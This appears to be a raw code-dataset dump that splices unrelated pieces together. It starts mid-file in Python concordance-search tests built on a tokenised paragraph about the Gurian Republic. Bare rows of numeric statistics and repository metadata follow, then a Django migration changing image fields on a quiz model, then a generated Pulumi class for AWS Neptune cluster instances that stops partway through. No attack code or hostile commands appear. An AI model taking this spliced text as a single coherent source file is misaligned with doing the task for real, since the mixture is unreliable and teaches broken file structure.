'Marxists']
pivot_token = ['Russian']
target_token = ['Revolution']
result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
True, False)
expected_line = ' . The 1905 Russian Revolution led to uprisings throughout the Empire , including Georgia'
expected_left_line = '. The 1905'
expected_left_context = ' '
expected_right_line ='Revolution led to uprisings throughout the Empire ,'
expected_right_context = 'including Georgia'
expected_query = 'Russian'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_7(self):
corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
pivot_token = ['Empire']
target_token = ['It']
result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
True, False)
expected_line = 'western Georgian and 1906 , against the Russian Empire . It arose from a revolt over land grazing rights ; taxation'
expected_left_line = 'and 1906 , against the Russian'
expected_left_context = 'western Georgian'
expected_right_line ='. It arose from a revolt over land grazing'
expected_right_context = 'rights ; taxation'
expected_query = 'Empire'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_8(self):
corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
pivot_token = ['Empire']
target_token = ['It']
result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
False, False)
expected_line = 'western Georgian and 1906 , against the Russian Empire . It arose from a revolt over land grazing rights ; taxation'
expected_left_line = 'and 1906 , against the Russian'
expected_left_context = 'western Georgian'
expected_right_line ='. It arose from a revolt over land grazing'
expected_right_context = 'rights ; taxation'
expected_query = 'Empire'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
| 99.48265
| 1,601
| 0.543157
| 3,152
| 31,536
| 5.313135
| 0.083439
| 0.046814
| 0.027587
| 0.032245
| 0.963814
| 0.961545
| 0.957246
| 0.949603
| 0.944945
| 0.942079
| 0
| 0.01689
| 0.233987
| 31,536
| 316
| 1,602
| 99.797468
| 0.676243
| 0.001839
| 0
| 0.801471
| 0
| 0.011029
| 0.385148
| 0
| 0
| 0
| 0
| 0
| 0.238971
| 1
| 0.040441
| false
| 0
| 0.014706
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7d2ce6c32df37d92b8fc43e772c5879283492fb
| 1,684
|
py
|
Python
|
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-29 11:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0002_auto_20171129_1139'),
]
operations = [
migrations.AlterField(
model_name='mcq',
name='optionA_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='optionB_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='optionC_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='optionD_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='optionE_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='question_diagram',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
migrations.AlterField(
model_name='mcq',
name='question_text_image',
field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
),
]
| 33.019608
| 90
| 0.584323
| 185
| 1,684
| 5.156757
| 0.286486
| 0.146751
| 0.183438
| 0.212788
| 0.752621
| 0.752621
| 0.714885
| 0.714885
| 0.714885
| 0.714885
| 0
| 0.027477
| 0.286817
| 1,684
| 50
| 91
| 33.68
| 0.766861
| 0.04038
| 0
| 0.651163
| 1
| 0
| 0.153131
| 0.014259
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046512
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7d3bbbfd8bd11a96c8ed6529adcabeaad5a5b93
| 57,611
|
py
|
Python
|
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ClusterInstanceArgs', 'ClusterInstance']
@pulumi.input_type
class ClusterInstanceArgs:
def __init__(__self__, *,
cluster_identifier: pulumi.Input[str],
instance_class: pulumi.Input[str],
apply_immediately: Optional[pulumi.Input[bool]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ClusterInstance resource.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
"""
pulumi.set(__self__, "cluster_identifier", cluster_identifier)
pulumi.set(__self__, "instance_class", instance_class)
if apply_immediately is not None:
pulumi.set(__self__, "apply_immediately", apply_immediately)
if auto_minor_version_upgrade is not None:
pulumi.set(__self__, "auto_minor_version_upgrade", auto_minor_version_upgrade)
if availability_zone is not None:
pulumi.set(__self__, "availability_zone", availability_zone)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if engine_version is not None:
pulumi.set(__self__, "engine_version", engine_version)
if identifier is not None:
pulumi.set(__self__, "identifier", identifier)
if identifier_prefix is not None:
pulumi.set(__self__, "identifier_prefix", identifier_prefix)
if neptune_parameter_group_name is not None:
pulumi.set(__self__, "neptune_parameter_group_name", neptune_parameter_group_name)
if neptune_subnet_group_name is not None:
pulumi.set(__self__, "neptune_subnet_group_name", neptune_subnet_group_name)
if port is not None:
pulumi.set(__self__, "port", port)
if preferred_backup_window is not None:
pulumi.set(__self__, "preferred_backup_window", preferred_backup_window)
if preferred_maintenance_window is not None:
pulumi.set(__self__, "preferred_maintenance_window", preferred_maintenance_window)
if promotion_tier is not None:
pulumi.set(__self__, "promotion_tier", promotion_tier)
if publicly_accessible is not None:
pulumi.set(__self__, "publicly_accessible", publicly_accessible)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> pulumi.Input[str]:
"""
The identifier of the `neptune.Cluster` in which to launch this instance.
"""
return pulumi.get(self, "cluster_identifier")
@cluster_identifier.setter
def cluster_identifier(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_identifier", value)
@property
@pulumi.getter(name="instanceClass")
def instance_class(self) -> pulumi.Input[str]:
"""
The instance class to use.
"""
return pulumi.get(self, "instance_class")
@instance_class.setter
def instance_class(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_class", value)
@property
@pulumi.getter(name="applyImmediately")
def apply_immediately(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
"""
return pulumi.get(self, "apply_immediately")
@apply_immediately.setter
def apply_immediately(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "apply_immediately", value)
@property
@pulumi.getter(name="autoMinorVersionUpgrade")
def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
"""
return pulumi.get(self, "auto_minor_version_upgrade")
@auto_minor_version_upgrade.setter
def auto_minor_version_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_minor_version_upgrade", value)
@property
@pulumi.getter(name="availabilityZone")
def availability_zone(self) -> Optional[pulumi.Input[str]]:
"""
The EC2 Availability Zone that the neptune instance is created in.
"""
return pulumi.get(self, "availability_zone")
@availability_zone.setter
def availability_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "availability_zone", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> Optional[pulumi.Input[str]]:
"""
The neptune engine version.
"""
return pulumi.get(self, "engine_version")
@engine_version.setter
def engine_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_version", value)
@property
@pulumi.getter
def identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
"""
return pulumi.get(self, "identifier")
@identifier.setter
def identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier", value)
@property
@pulumi.getter(name="identifierPrefix")
def identifier_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
"""
return pulumi.get(self, "identifier_prefix")
@identifier_prefix.setter
def identifier_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier_prefix", value)
@property
@pulumi.getter(name="neptuneParameterGroupName")
def neptune_parameter_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the neptune parameter group to associate with this instance.
"""
return pulumi.get(self, "neptune_parameter_group_name")
@neptune_parameter_group_name.setter
def neptune_parameter_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_parameter_group_name", value)
@property
@pulumi.getter(name="neptuneSubnetGroupName")
def neptune_subnet_group_name(self) -> Optional[pulumi.Input[str]]:
"""
A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
"""
return pulumi.get(self, "neptune_subnet_group_name")
@neptune_subnet_group_name.setter
def neptune_subnet_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_subnet_group_name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port on which the DB accepts connections. Defaults to `8182`.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="preferredBackupWindow")
def preferred_backup_window(self) -> Optional[pulumi.Input[str]]:
"""
The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
"""
return pulumi.get(self, "preferred_backup_window")
@preferred_backup_window.setter
def preferred_backup_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_backup_window", value)
@property
@pulumi.getter(name="preferredMaintenanceWindow")
def preferred_maintenance_window(self) -> Optional[pulumi.Input[str]]:
"""
The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
"""
return pulumi.get(self, "preferred_maintenance_window")
@preferred_maintenance_window.setter
def preferred_maintenance_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_maintenance_window", value)
@property
@pulumi.getter(name="promotionTier")
def promotion_tier(self) -> Optional[pulumi.Input[int]]:
"""
Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
"""
return pulumi.get(self, "promotion_tier")
@promotion_tier.setter
def promotion_tier(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "promotion_tier", value)
@property
@pulumi.getter(name="publiclyAccessible")
def publicly_accessible(self) -> Optional[pulumi.Input[bool]]:
"""
Bool to control if instance is publicly accessible. Default is `false`.
"""
return pulumi.get(self, "publicly_accessible")
@publicly_accessible.setter
def publicly_accessible(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "publicly_accessible", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the instance.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ClusterInstanceState:
def __init__(__self__, *,
address: Optional[pulumi.Input[str]] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
arn: Optional[pulumi.Input[str]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
dbi_resource_id: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
kms_key_arn: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
writer: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering ClusterInstance resources.
:param pulumi.Input[str] address: The hostname of the instance. See also `endpoint` and `port`.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of neptune instance
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] dbi_resource_id: The region-unique, immutable identifier for the neptune instance.
:param pulumi.Input[str] endpoint: The connection endpoint in `address:port` format.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] kms_key_arn: The ARN for the KMS encryption key if one is set to the neptune cluster.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the neptune cluster is encrypted.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
:param pulumi.Input[bool] writer: Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
if address is not None:
pulumi.set(__self__, "address", address)
if apply_immediately is not None:
pulumi.set(__self__, "apply_immediately", apply_immediately)
if arn is not None:
pulumi.set(__self__, "arn", arn)
if auto_minor_version_upgrade is not None:
pulumi.set(__self__, "auto_minor_version_upgrade", auto_minor_version_upgrade)
if availability_zone is not None:
pulumi.set(__self__, "availability_zone", availability_zone)
if cluster_identifier is not None:
pulumi.set(__self__, "cluster_identifier", cluster_identifier)
if dbi_resource_id is not None:
pulumi.set(__self__, "dbi_resource_id", dbi_resource_id)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if engine_version is not None:
pulumi.set(__self__, "engine_version", engine_version)
if identifier is not None:
pulumi.set(__self__, "identifier", identifier)
if identifier_prefix is not None:
pulumi.set(__self__, "identifier_prefix", identifier_prefix)
if instance_class is not None:
pulumi.set(__self__, "instance_class", instance_class)
if kms_key_arn is not None:
pulumi.set(__self__, "kms_key_arn", kms_key_arn)
if neptune_parameter_group_name is not None:
pulumi.set(__self__, "neptune_parameter_group_name", neptune_parameter_group_name)
if neptune_subnet_group_name is not None:
pulumi.set(__self__, "neptune_subnet_group_name", neptune_subnet_group_name)
if port is not None:
pulumi.set(__self__, "port", port)
if preferred_backup_window is not None:
pulumi.set(__self__, "preferred_backup_window", preferred_backup_window)
if preferred_maintenance_window is not None:
pulumi.set(__self__, "preferred_maintenance_window", preferred_maintenance_window)
if promotion_tier is not None:
pulumi.set(__self__, "promotion_tier", promotion_tier)
if publicly_accessible is not None:
pulumi.set(__self__, "publicly_accessible", publicly_accessible)
if storage_encrypted is not None:
pulumi.set(__self__, "storage_encrypted", storage_encrypted)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if writer is not None:
pulumi.set(__self__, "writer", writer)
@property
@pulumi.getter
def address(self) -> Optional[pulumi.Input[str]]:
"""
The hostname of the instance. See also `endpoint` and `port`.
"""
return pulumi.get(self, "address")
@address.setter
def address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address", value)
@property
@pulumi.getter(name="applyImmediately")
def apply_immediately(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
"""
return pulumi.get(self, "apply_immediately")
